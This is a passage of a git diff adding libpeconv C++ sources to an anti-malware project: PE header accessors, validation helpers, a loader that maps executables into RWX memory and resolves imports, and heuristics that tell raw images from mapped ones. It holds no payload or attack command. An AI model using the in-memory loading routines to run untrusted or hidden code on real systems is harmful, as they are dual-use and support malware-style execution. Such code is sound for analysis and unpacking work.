IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + img_base = payload_nt_hdr64->OptionalHeader.ImageBase; + } else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + img_base = static_cast(payload_nt_hdr32->OptionalHeader.ImageBase); + } + return img_base; +} + +DWORD peconv::get_entry_point_rva(IN const BYTE *pe_buffer) +{ + bool is64b = is64bit(pe_buffer); + //update image base in the written content: + BYTE* payload_nt_hdr = get_nt_hdrs(pe_buffer); + if (!payload_nt_hdr) { + return 0; + } + DWORD value = 0; + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + value = payload_nt_hdr64->OptionalHeader.AddressOfEntryPoint; + } else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + value = payload_nt_hdr32->OptionalHeader.AddressOfEntryPoint; + } + return value; +} + +bool peconv::update_entry_point_rva(IN OUT BYTE *pe_buffer, IN DWORD value) +{ + bool is64b = is64bit(pe_buffer); + //update image base in the written content: + BYTE* payload_nt_hdr = get_nt_hdrs(pe_buffer); + if (!payload_nt_hdr) { + return false; + } + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + payload_nt_hdr64->OptionalHeader.AddressOfEntryPoint = value; + } else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + payload_nt_hdr32->OptionalHeader.AddressOfEntryPoint = value; + } + return true; +} + +DWORD peconv::get_hdrs_size(IN const BYTE *pe_buffer) +{ + bool is64b = is64bit(pe_buffer); + BYTE* payload_nt_hdr = get_nt_hdrs(pe_buffer); + if (!payload_nt_hdr) { + return 0; + } + DWORD hdrs_size = 0; + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + hdrs_size = payload_nt_hdr64->OptionalHeader.SizeOfHeaders; + } else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + hdrs_size = payload_nt_hdr32->OptionalHeader.SizeOfHeaders; + } + return hdrs_size; +} + +bool peconv::update_image_base(IN OUT BYTE* payload, IN ULONGLONG destImageBase) +{ + bool is64b = is64bit(payload); + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + if (!payload_nt_hdr) { + return false; + } + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + payload_nt_hdr64->OptionalHeader.ImageBase = (ULONGLONG)destImageBase; + } + else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + payload_nt_hdr32->OptionalHeader.ImageBase = (DWORD)destImageBase; + } + return true; +} + +template +inline const IMAGE_FILE_HEADER* fetch_file_hdr(IN const BYTE* payload, IN const size_t buffer_size, IN const IMAGE_NT_HEADERS_T *payload_nt_hdr) +{ + if (!payload || !payload_nt_hdr) return nullptr; + + const IMAGE_FILE_HEADER *fileHdr = &(payload_nt_hdr->FileHeader); + + if (!validate_ptr((const LPVOID)payload, buffer_size, (const LPVOID)fileHdr, sizeof(IMAGE_FILE_HEADER))) { + return nullptr; + } + return fileHdr; +} + +const IMAGE_FILE_HEADER* peconv::get_file_hdr(IN const BYTE* payload, IN const size_t buffer_size) +{ + if (!payload) return nullptr; + + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + if (!payload_nt_hdr) { + return nullptr; + } + if (is64bit(payload)) { + return fetch_file_hdr(payload, buffer_size, (IMAGE_NT_HEADERS64*)payload_nt_hdr); + } + return fetch_file_hdr(payload, buffer_size, (IMAGE_NT_HEADERS32*)payload_nt_hdr); +} + +template +inline const LPVOID fetch_opt_hdr(IN const BYTE* payload, IN const size_t buffer_size, IN const IMAGE_NT_HEADERS_T *payload_nt_hdr) +{ + if (!payload) return nullptr; + + const IMAGE_FILE_HEADER *fileHdr = fetch_file_hdr(payload, buffer_size, payload_nt_hdr); + if (!fileHdr) { + return nullptr; + } + const LPVOID opt_hdr = (const LPVOID) &(payload_nt_hdr->OptionalHeader); + const size_t opt_size = fileHdr->SizeOfOptionalHeader; + if (!validate_ptr((const LPVOID)payload, buffer_size, opt_hdr, opt_size)) { + return nullptr; + } + return opt_hdr; +} + +LPVOID peconv::get_optional_hdr(IN const BYTE* payload, IN const size_t buffer_size) +{ + if (!payload) return nullptr; + + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + const IMAGE_FILE_HEADER* fileHdr = get_file_hdr(payload, buffer_size); + if (!payload_nt_hdr || !fileHdr) { + return nullptr; + } + if (is64bit(payload)) { + return fetch_opt_hdr(payload,buffer_size, (IMAGE_NT_HEADERS64*)payload_nt_hdr); + } + return fetch_opt_hdr(payload, buffer_size, (IMAGE_NT_HEADERS32*)payload_nt_hdr); +} + +template +inline LPVOID fetch_section_hdrs_ptr(IN const BYTE* payload, IN const size_t buffer_size, IN const IMAGE_NT_HEADERS_T *payload_nt_hdr) +{ + const IMAGE_FILE_HEADER *fileHdr = fetch_file_hdr(payload, buffer_size, payload_nt_hdr); + if (!fileHdr) { + return nullptr; + } + const size_t opt_size = fileHdr->SizeOfOptionalHeader; + BYTE* opt_hdr = (BYTE*)fetch_opt_hdr(payload, buffer_size, payload_nt_hdr); + if (!validate_ptr((const LPVOID)payload, buffer_size, opt_hdr, opt_size)) { + return nullptr; + } + //sections headers starts right after the end of the optional header + return (LPVOID)(opt_hdr + opt_size); +} + +size_t peconv::get_sections_count(IN const BYTE* payload, IN const size_t buffer_size) +{ + const IMAGE_FILE_HEADER* fileHdr = get_file_hdr(payload, buffer_size); + if (!fileHdr) { + return 0; + } + return fileHdr->NumberOfSections; +} + +bool peconv::is_valid_sections_hdr_offset(IN const BYTE* buffer, IN const size_t buffer_size) +{ + size_t sec_count = peconv::get_sections_count(buffer, buffer_size); + if (sec_count == 0) { + //no sections found - a valid PE should have at least one section + return false; + } + PIMAGE_SECTION_HEADER last_hdr = get_section_hdr(buffer, buffer_size, sec_count - 1); + if (!last_hdr) { + //could not fetch the last section + return false; + } + return true; +} + +PIMAGE_SECTION_HEADER peconv::get_section_hdr(IN const BYTE* payload, IN const size_t buffer_size, IN size_t section_num) +{ + if (!payload) return nullptr; + + const size_t sections_count = peconv::get_sections_count(payload, buffer_size); + if (section_num >= sections_count) { + return nullptr; + } + + LPVOID nt_hdrs = peconv::get_nt_hdrs(payload); + if (!nt_hdrs) return nullptr; //this should never happened, because the get_sections_count did not fail + + LPVOID secptr = nullptr; + //get the beginning of sections headers: + if (is64bit(payload)) { + secptr = fetch_section_hdrs_ptr(payload, buffer_size, (IMAGE_NT_HEADERS64*)nt_hdrs); + } + else { + secptr = fetch_section_hdrs_ptr(payload, buffer_size, (IMAGE_NT_HEADERS32*)nt_hdrs); + } + //get the section header of given number: + PIMAGE_SECTION_HEADER next_sec = (PIMAGE_SECTION_HEADER)( + (ULONGLONG)secptr + (IMAGE_SIZEOF_SECTION_HEADER * section_num) + ); + //validate pointer: + if (!validate_ptr((const LPVOID) payload, buffer_size, (const LPVOID) next_sec, sizeof(IMAGE_SECTION_HEADER))) { + return nullptr; + } + return next_sec; +} + +WORD peconv::get_file_characteristics(IN const BYTE* payload) +{ + if (!payload) return 0; + + bool is64b = is64bit(payload); + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + if (!payload_nt_hdr) { + return 0; + } + IMAGE_FILE_HEADER *fileHdr = nullptr; + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + fileHdr = &(payload_nt_hdr64->FileHeader); + } + else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + fileHdr = &(payload_nt_hdr32->FileHeader); + } + return fileHdr->Characteristics; +} + +bool peconv::is_module_dll(IN const BYTE* payload) +{ + if (!payload) return false; + WORD charact = get_file_characteristics(payload); + return ((charact & IMAGE_FILE_DLL) != 0); +} + +WORD peconv::get_dll_characteristics(IN const BYTE* payload) +{ + if (!payload) return 0; + + bool is64b = is64bit(payload); + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + if (!payload_nt_hdr) { + return 0; + } + WORD charact = 0; + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + charact = payload_nt_hdr64->OptionalHeader.DllCharacteristics; + } + else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + charact = payload_nt_hdr32->OptionalHeader.DllCharacteristics; + } + return charact; +} + +bool peconv::set_subsystem(IN OUT BYTE* payload, IN WORD subsystem) +{ + if (!payload) return false; + + bool is64b = is64bit(payload); + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + if (!payload_nt_hdr) { + return false; + } + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + payload_nt_hdr64->OptionalHeader.Subsystem = subsystem; + } else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + payload_nt_hdr32->OptionalHeader.Subsystem = subsystem; + } + return true; +} + +WORD peconv::get_subsystem(IN const BYTE* payload) +{ + if (!payload) return 0; + + bool is64b = is64bit(payload); + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + if (payload_nt_hdr == NULL) { + return 0; + } + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + return payload_nt_hdr64->OptionalHeader.Subsystem; + } else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + return payload_nt_hdr32->OptionalHeader.Subsystem; + } +} + +bool peconv::has_relocations(IN const BYTE *pe_buffer) +{ + IMAGE_DATA_DIRECTORY* relocDir = get_directory_entry(pe_buffer, IMAGE_DIRECTORY_ENTRY_BASERELOC); + if (!relocDir) { + return false; + } + return true; +} + +IMAGE_EXPORT_DIRECTORY* peconv::get_export_directory(IN HMODULE modulePtr) +{ + return get_type_directory(modulePtr, IMAGE_DIRECTORY_ENTRY_EXPORT); +} + + +IMAGE_COR20_HEADER * peconv::get_dotnet_hdr(IN const BYTE* module, IN size_t const module_size, IN const IMAGE_DATA_DIRECTORY * dotNetDir) +{ + DWORD rva = dotNetDir->VirtualAddress; + DWORD hdr_size = dotNetDir->Size; + if (!peconv::validate_ptr(module, module_size, module + rva, hdr_size)) { + return nullptr; + } + IMAGE_COR20_HEADER *dnet_hdr = (IMAGE_COR20_HEADER*)(module + rva); + if (!peconv::validate_ptr(module, module_size, module + dnet_hdr->MetaData.VirtualAddress, dnet_hdr->MetaData.Size)) { + return nullptr; + } + DWORD* signature_ptr = (DWORD*)(module + dnet_hdr->MetaData.VirtualAddress); + const DWORD dotNetSign = 0x424A5342; + if (*signature_ptr != dotNetSign) { + //invalid header + return nullptr; + } + return dnet_hdr; +} + +template +DWORD* _get_sec_alignment_ptr(const BYTE* modulePtr, bool is_raw) +{ + IMAGE_NT_HEADERS_T* hdrs = reinterpret_cast(peconv::get_nt_hdrs(modulePtr)); + if (!hdrs) return nullptr; + if (is_raw) { + return &hdrs->OptionalHeader.FileAlignment; + } + return &hdrs->OptionalHeader.SectionAlignment; +} + +DWORD peconv::get_sec_alignment(IN const BYTE* modulePtr, IN bool is_raw) +{ + DWORD* alignment = 0; + if (peconv::is64bit(modulePtr)) { + alignment = _get_sec_alignment_ptr(modulePtr, is_raw); + } else { + alignment = _get_sec_alignment_ptr(modulePtr, is_raw); + } + if (!alignment) return 0; + return *alignment; +} + +bool peconv::set_sec_alignment(IN OUT BYTE* modulePtr, IN bool is_raw, IN DWORD new_alignment) +{ + DWORD* alignment = 0; + if (peconv::is64bit(modulePtr)) { + alignment = _get_sec_alignment_ptr(modulePtr, is_raw); + } + else { + alignment = _get_sec_alignment_ptr(modulePtr, is_raw); + } + if (!alignment) return false; + + *alignment = new_alignment; + return true; +} + +DWORD peconv::get_virtual_sec_size(IN const BYTE* pe_hdr, IN const PIMAGE_SECTION_HEADER sec_hdr, IN bool rounded) +{ + if (!pe_hdr || !sec_hdr) { + return 0; + } + if (!rounded) { + return sec_hdr->Misc.VirtualSize;; + } + //TODO: calculate real size, round up to Virtual Alignment + DWORD alignment = peconv::get_sec_alignment((const PBYTE)pe_hdr, false); + DWORD vsize = sec_hdr->Misc.VirtualSize; + + DWORD units = vsize / alignment; + if ((vsize % alignment) > 0) units++; + + vsize = units * alignment; + + DWORD image_size = peconv::get_image_size(pe_hdr); + //if it is bigger than the image size, use the size from the headers + if ((sec_hdr->VirtualAddress + vsize) > image_size) { + vsize = sec_hdr->Misc.VirtualSize; + } + return vsize; +} + +PIMAGE_SECTION_HEADER peconv::get_last_section(IN const PBYTE pe_buffer, IN size_t pe_size, IN bool is_raw) +{ + SIZE_T module_end = peconv::get_hdrs_size(pe_buffer); + const size_t sections_count = peconv::get_sections_count(pe_buffer, pe_size); + if (sections_count == 0) { + return nullptr; + } + PIMAGE_SECTION_HEADER last_sec = nullptr; + //walk through sections + for (size_t i = 0; i < sections_count; i++) { + PIMAGE_SECTION_HEADER sec = peconv::get_section_hdr(pe_buffer, pe_size, i); + if (!sec) break; + + size_t new_end = is_raw ? (sec->PointerToRawData + sec->SizeOfRawData) : (sec->VirtualAddress + sec->Misc.VirtualSize); + if (new_end > module_end) { + module_end = new_end; + last_sec = sec; + } + } + return last_sec; +} + +DWORD peconv::calc_pe_size(IN const PBYTE pe_buffer, IN size_t pe_size, IN bool is_raw) +{ + DWORD module_end = peconv::get_hdrs_size(pe_buffer); + const size_t sections_count = peconv::get_sections_count(pe_buffer, pe_size); + if (sections_count == 0) { + return module_end; + } + //walk through sections + for (size_t i = 0; i < sections_count; i++) { + PIMAGE_SECTION_HEADER sec = peconv::get_section_hdr(pe_buffer, pe_size, i); + if (!sec) break; + + DWORD new_end = is_raw ? (sec->PointerToRawData + sec->SizeOfRawData) : (sec->VirtualAddress + sec->Misc.VirtualSize); + if (new_end > module_end) module_end = new_end; + } + return module_end; +} + +bool peconv::is_valid_sectons_alignment(IN const BYTE* payload, IN const SIZE_T payload_size, IN bool is_raw) +{ + if (payload == NULL) return false; + + const DWORD my_align = peconv::get_sec_alignment(payload, is_raw); + if (my_align == 0) { +#ifdef _DEBUG + std::cout << "Section alignment cannot be 0\n"; +#endif + return false; + } + const size_t sections_count = peconv::get_sections_count(payload, payload_size); + if (sections_count == 0) { + //no sections + return false; + } + for (size_t i = 0; i < sections_count; i++) { + PIMAGE_SECTION_HEADER next_sec = peconv::get_section_hdr(payload, payload_size, i); + if (!next_sec) return false; //the number of the sections in header is out of scope + + const DWORD next_sec_addr = is_raw ? (next_sec->PointerToRawData) : (next_sec->VirtualAddress); + + SIZE_T sec_size = is_raw ? next_sec->SizeOfRawData : next_sec->Misc.VirtualSize; + if (sec_size == 0) continue; + if (next_sec->Misc.VirtualSize == 0) { + continue; // if the VirtualSize == 0 the section will not be mapped anyways + } + if (next_sec_addr == 0) { + //if cannot be 0 if the size is not 0 + return false; + } + + //check only if raw_align is non-zero + if (my_align && next_sec_addr % my_align != 0) { +#ifdef _DEBUG + std::cout << "Section is misaligned\n"; +#endif + return false; //misaligned + } + } + return true; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/pe_loader.cpp b/ai_anti_malware/libpeconv/libpeconv/src/pe_loader.cpp new file mode 100644 index 0000000..e1720fe --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/pe_loader.cpp @@ -0,0 +1,122 @@ +#include "peconv/pe_loader.h" + +#include "peconv/relocate.h" +#include "peconv/imports_loader.h" +#include "peconv/buffer_util.h" +#include "peconv/function_resolver.h" +#include "peconv/exports_lookup.h" + +#include + +using namespace peconv; + +namespace peconv { + BYTE* load_no_sec_pe(BYTE* dllRawData, size_t r_size, OUT size_t &v_size, bool executable) + { + ULONGLONG desired_base = 0; + size_t out_size = (r_size < PAGE_SIZE) ? PAGE_SIZE : r_size; + if (executable) { + desired_base = get_image_base(dllRawData); + out_size = peconv::get_image_size(dllRawData); + } + DWORD protect = (executable) ? PAGE_EXECUTE_READWRITE : PAGE_READWRITE; + BYTE* mappedPE = peconv::alloc_pe_buffer(out_size, protect, desired_base); + if (!mappedPE) { + return NULL; + } + memcpy(mappedPE, dllRawData, r_size); + v_size = out_size; + return mappedPE; + } +}; + +BYTE* peconv::load_pe_module(BYTE* dllRawData, size_t r_size, OUT size_t &v_size, bool executable, bool relocate) +{ + if (!peconv::get_nt_hdrs(dllRawData)) { + return NULL; + } + if (peconv::get_sections_count(dllRawData, r_size) == 0) { + return load_no_sec_pe(dllRawData, r_size, v_size, executable); + } + // by default, allow to load the PE at any base: + ULONGLONG desired_base = NULL; + // if relocating is required, but the PE has no relocation table... + if (relocate && !has_relocations(dllRawData)) { + // ...enforce loading the PE image at its default base (so that it will need no relocations) + desired_base = get_image_base(dllRawData); + } + // load a virtual image of the PE file at the desired_base address (random if desired_base is NULL): + BYTE *mappedDLL = pe_raw_to_virtual(dllRawData, r_size, v_size, executable, desired_base); + if (mappedDLL) { + //if the image was loaded at its default base, relocate_module will return always true (because relocating is already done) + if (relocate && !relocate_module(mappedDLL, v_size, (ULONGLONG)mappedDLL)) { + // relocating was required, but it failed - thus, the full PE image is useless + printf("Could not relocate the module!"); + free_pe_buffer(mappedDLL, v_size); + mappedDLL = NULL; + } + } else { + printf("Could not allocate memory at the desired base!\n"); + } + return mappedDLL; +} + +BYTE* peconv::load_pe_module(const char *filename, OUT size_t &v_size, bool executable, bool relocate) +{ + size_t r_size = 0; + BYTE *dllRawData = load_file(filename, r_size); + if (!dllRawData) { +#ifdef _DEBUG + std::cerr << "Cannot load the file: " << filename << std::endl; +#endif + return NULL; + } + BYTE* mappedPE = load_pe_module(dllRawData, r_size, v_size, executable, relocate); + free_pe_buffer(dllRawData); + return mappedPE; +} + +BYTE* peconv::load_pe_executable(BYTE* dllRawData, size_t r_size, OUT size_t &v_size, t_function_resolver* import_resolver) +{ + BYTE* loaded_pe = load_pe_module(dllRawData, r_size, v_size, true, true); + if (!loaded_pe) { + printf("[-] Loading failed!\n"); + return NULL; + } +#if _DEBUG + printf("Loaded at: %p\n", loaded_pe); +#endif + if (has_valid_import_table(loaded_pe, v_size)) { + if (!load_imports(loaded_pe, import_resolver)) { + printf("[-] Loading imports failed!"); + free_pe_buffer(loaded_pe, v_size); + return NULL; + } + } + else { + printf("[-] PE doesn't have a valid Import Table!\n"); + } + return loaded_pe; +} + + +BYTE* peconv::load_pe_executable(const char *my_path, OUT size_t &v_size, t_function_resolver* import_resolver) +{ +#if _DEBUG + printf("Module: %s\n", my_path); +#endif + BYTE* loaded_pe = load_pe_module(my_path, v_size, true, true); + if (!loaded_pe) { + printf("Loading failed!\n"); + return NULL; + } +#if _DEBUG + printf("Loaded at: %p\n", loaded_pe); +#endif + if (!load_imports(loaded_pe, import_resolver)) { + printf("[-] Loading imports failed!"); + free_pe_buffer(loaded_pe, v_size); + return NULL; + } + return loaded_pe; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/pe_mode_detector.cpp b/ai_anti_malware/libpeconv/libpeconv/src/pe_mode_detector.cpp new file mode 100644 index 0000000..13fb75e --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/pe_mode_detector.cpp @@ -0,0 +1,205 @@ +#include "peconv/pe_mode_detector.h" +#include "peconv/util.h" +#include "peconv/imports_loader.h" +#include "peconv/relocate.h" + +#ifdef _DEBUG +#include +#endif + +// Check if gaps between sections are typical for Virtual Alignment. +// Returns true if confirmed, false if not confirmed. False result can also mean that data was invalid/insufficient to decide. +bool is_virtual_padding(const BYTE* pe_buffer, size_t pe_size) +{ + const size_t r_align = peconv::get_sec_alignment((PBYTE)pe_buffer, true); + + size_t sections_count = peconv::get_sections_count(pe_buffer, pe_size); + if (sections_count < 2) return false; + + bool is_valid_padding = false; + for (size_t i = 1; i < sections_count; i += 2) { + PIMAGE_SECTION_HEADER sec1 = peconv::get_section_hdr(pe_buffer, pe_size, i-1); + PIMAGE_SECTION_HEADER sec2 = peconv::get_section_hdr(pe_buffer, pe_size, i); + if (!sec1 || !sec2) continue; //skip if fetching any of the sections failed + + if (sec1->SizeOfRawData == 0) continue; //skip empty sections + + const DWORD sec1_end_offset = sec1->VirtualAddress + sec1->SizeOfRawData; + if (sec2->VirtualAddress == sec1_end_offset) continue; + + if (sec2->VirtualAddress < sec1_end_offset) { + //std::cout << "Invalid size of the section: " << std::hex << sec2->VirtualAddress << " vs "<< sec1_end_offset << std::endl; + return false; + } + const size_t diff = sec2->VirtualAddress - sec1_end_offset; + if (diff < r_align) continue; //to small to determine + + BYTE* sec1_end_ptr = (BYTE*)((ULONGLONG)pe_buffer + sec1_end_offset); + if (!peconv::validate_ptr((const LPVOID)pe_buffer, pe_size, sec1_end_ptr, diff)) { + //std::cout << "Invalid pointer to the section\n"; + return false; + } + if (peconv::is_padding(sec1_end_ptr, diff, 0)) { + is_valid_padding = true; + } + else { + return false; + } + } + return is_valid_padding; +} + +// Check if the gap between the end of headers and the first section is typical for Virtual Alignment. +// Returns true if confirmed, false if not confirmed. False result can also mean that data was invalid/insufficient to decide. +bool is_hdr_virtual_align(const BYTE* pe_buffer, size_t pe_size) +{ + const size_t v_align = peconv::get_sec_alignment((PBYTE)pe_buffer, false); + if (peconv::get_hdrs_size(pe_buffer) >= v_align) { + //undetermined for such case + return false; + } + //walk through sections and check their sizes + size_t sections_count = peconv::get_sections_count(pe_buffer, pe_size); + if (sections_count == 0) return false; + for (size_t i = 0; i < sections_count; i++) { + PIMAGE_SECTION_HEADER sec = peconv::get_section_hdr(pe_buffer, pe_size, i); + if (!sec || sec->PointerToRawData == 0 || sec->SizeOfRawData == 0) { + continue; // check next + } + if (sec->PointerToRawData >= v_align) continue; + + size_t diff = v_align - sec->PointerToRawData; + BYTE* sec_raw_ptr = (BYTE*)((ULONGLONG)pe_buffer + sec->PointerToRawData); + if (!peconv::validate_ptr((const LPVOID)pe_buffer, pe_size, sec_raw_ptr, diff)) { + return false; + } + if (peconv::is_padding(sec_raw_ptr, diff, 0)) { + return true; + } + } + return false; +} + +bool sec_hdrs_erased(IN const BYTE* pe_buffer, IN size_t pe_size, bool is_raw) +{ + const size_t count = peconv::get_sections_count(pe_buffer, pe_size); + for (size_t i = 0; i < count; i++) { + const IMAGE_SECTION_HEADER* hdr = peconv::get_section_hdr(pe_buffer, pe_size, i); + if (!hdr) continue; + if (is_raw) { + if (hdr->PointerToRawData != 0) return false; + } + else { + if (hdr->VirtualAddress != 0) return false; + } + } + return true; +} + +bool peconv::is_pe_raw_eq_virtual(IN const BYTE* pe_buffer, IN size_t pe_size) +{ + const size_t count = peconv::get_sections_count(pe_buffer, pe_size); + for (size_t i = 0; i < count; i++) { + const IMAGE_SECTION_HEADER* hdr = peconv::get_section_hdr(pe_buffer, pe_size, i); + if (!hdr) continue; + + if (hdr->VirtualAddress != hdr->PointerToRawData) { + return false; + } + } + return true; +} + +bool is_pe_mapped(IN const BYTE* pe_buffer, IN size_t pe_size) +{ + size_t v_score = 0; + if (peconv::has_valid_import_table((const PBYTE)pe_buffer, pe_size)) { +#ifdef _DEBUG + std::cout << "Valid Import Table found" << std::endl; +#endif + v_score++; + } + if (peconv::has_valid_relocation_table((const PBYTE)pe_buffer, pe_size)) { +#ifdef _DEBUG + std::cout << "Valid Relocations Table found" << std::endl; +#endif + v_score++; + } + if (is_hdr_virtual_align(pe_buffer, pe_size)) { +#ifdef _DEBUG + std::cout << "Header virtual align OK" << std::endl; +#endif + v_score++; + } + if (is_virtual_padding(pe_buffer, pe_size)) { +#ifdef _DEBUG + std::cout << "Virtual Padding OK" << std::endl; +#endif + v_score++; + } +#ifdef _DEBUG + std::cout << "TOTAL v_score: " << std::dec << v_score << std::endl; +#endif + if (v_score > 0) { + return true; + } + return false; +} + +bool peconv::is_pe_raw(IN const BYTE* pe_buffer, IN size_t pe_size) +{ + if (peconv::get_sections_count(pe_buffer, pe_size) == 0) { + return true; + } + if (is_pe_mapped(pe_buffer, pe_size)) { + // it has artefacts typical for a PE in a virtual alignment + return false; + } + if (sec_hdrs_erased(pe_buffer, pe_size, true)) { +#ifdef _DEBUG + std::cout << "Raw alignment is erased\n"; +#endif + // the raw alignment of the sections is erased + return false; + } + return true; +} + +// checks if any of the executable sections has been expanded in the memory +bool peconv::is_pe_expanded(IN const BYTE* pe_buffer, IN size_t pe_size) +{ + //walk through sections and check their sizes + size_t sections_count = peconv::get_sections_count(pe_buffer, pe_size); + for (size_t i = 0; i < sections_count; i++) { + PIMAGE_SECTION_HEADER sec = peconv::get_section_hdr(pe_buffer, pe_size, i); + //scan only executable sections + if ((sec->Characteristics & IMAGE_SCN_MEM_EXECUTE) != 0) { + if (is_section_expanded(pe_buffer, pe_size, sec)) { + return true; + } + } + } + return false; +} + +// checks if the section's content in memory is bigger than in the raw format +bool peconv::is_section_expanded(IN const BYTE* pe_buffer, IN size_t pe_size, IN const PIMAGE_SECTION_HEADER sec) +{ + if (!sec) return false; + + size_t sec_vsize = peconv::get_virtual_sec_size(pe_buffer, sec, true); + size_t sec_rsize = sec->SizeOfRawData; + + if (sec_rsize >= sec_vsize) return false; + size_t diff = sec_vsize - sec_rsize; + + BYTE* sec_raw_end_ptr = (BYTE*)((ULONGLONG)pe_buffer + sec->VirtualAddress + sec_rsize); + if (!peconv::validate_ptr((const LPVOID)pe_buffer, pe_size, sec_raw_end_ptr, diff)) { + return false; + } + if (!is_padding(sec_raw_end_ptr, diff, 0)) { + //this is not padding: non-zero content detected + return true; + } + return false; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/pe_raw_to_virtual.cpp b/ai_anti_malware/libpeconv/libpeconv/src/pe_raw_to_virtual.cpp new file mode 100644 index 0000000..06d90fc --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/pe_raw_to_virtual.cpp @@ -0,0 +1,140 @@ +#include "peconv/pe_raw_to_virtual.h" + +#include "peconv/util.h" +#include "peconv/pe_hdrs_helper.h" + +#include + +using namespace peconv; + +// Map raw PE into virtual memory of local process: +bool sections_raw_to_virtual(IN const BYTE* payload, IN SIZE_T payloadSize, OUT BYTE* destBuffer, IN SIZE_T destBufferSize) +{ + if (!payload || !destBuffer) return false; + + bool is64b = is64bit(payload); + + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + if (payload_nt_hdr == NULL) { + std::cerr << "Invalid payload: " << std::hex << (ULONGLONG) payload << std::endl; + return false; + } + + IMAGE_FILE_HEADER *fileHdr = NULL; + DWORD hdrsSize = 0; + LPVOID secptr = NULL; + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + fileHdr = &(payload_nt_hdr64->FileHeader); + hdrsSize = payload_nt_hdr64->OptionalHeader.SizeOfHeaders; + secptr = (LPVOID)((ULONGLONG)&(payload_nt_hdr64->OptionalHeader) + fileHdr->SizeOfOptionalHeader); + } + else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + fileHdr = &(payload_nt_hdr32->FileHeader); + hdrsSize = payload_nt_hdr32->OptionalHeader.SizeOfHeaders; + secptr = (LPVOID)((ULONGLONG)&(payload_nt_hdr32->OptionalHeader) + fileHdr->SizeOfOptionalHeader); + } + + DWORD first_raw = 0; + //copy all the sections, one by one: + SIZE_T raw_end = 0; + for (WORD i = 0; i < fileHdr->NumberOfSections; i++) { + PIMAGE_SECTION_HEADER next_sec = (PIMAGE_SECTION_HEADER)((ULONGLONG)secptr + (IMAGE_SIZEOF_SECTION_HEADER * i)); + if (!validate_ptr((const LPVOID)payload, destBufferSize, next_sec, IMAGE_SIZEOF_SECTION_HEADER)) { + return false; + } + if (next_sec->PointerToRawData == 0 || next_sec->SizeOfRawData == 0) { + continue; //skipping empty + } + LPVOID section_mapped = destBuffer + next_sec->VirtualAddress; + LPVOID section_raw_ptr = (BYTE*)payload + next_sec->PointerToRawData; + SIZE_T sec_size = next_sec->SizeOfRawData; + raw_end = next_sec->SizeOfRawData + next_sec->PointerToRawData; + + if ((next_sec->VirtualAddress + sec_size) > destBufferSize) { + std::cerr << "[!] Virtual section size is out ouf bounds: " << std::hex << sec_size << std::endl; + sec_size = (destBufferSize > next_sec->VirtualAddress) ? SIZE_T(destBufferSize - next_sec->VirtualAddress) : 0; + std::cerr << "[!] Truncated to maximal size: " << std::hex << sec_size << ", buffer size:" << destBufferSize << std::endl; + } + if (next_sec->VirtualAddress >= destBufferSize && sec_size != 0) { + std::cerr << "[-] VirtualAddress of section is out ouf bounds: " << std::hex << next_sec->VirtualAddress << std::endl; + return false; + } + if (next_sec->PointerToRawData + sec_size > destBufferSize) { + std::cerr << "[-] Raw section size is out ouf bounds: " << std::hex << sec_size << std::endl; + return false; + } + // validate source: + if (!validate_ptr((const LPVOID)payload, payloadSize, section_raw_ptr, sec_size)) { + std::cerr << "[-] Section " << i << ": out ouf bounds, skipping... " << std::endl; + continue; + } + // validate destination: + if (!peconv::validate_ptr(destBuffer, destBufferSize, section_mapped, sec_size)) { + std::cerr << "[-] Section " << i << ": out ouf bounds, skipping... " << std::endl; + continue; + } + memcpy(section_mapped, section_raw_ptr, sec_size); + 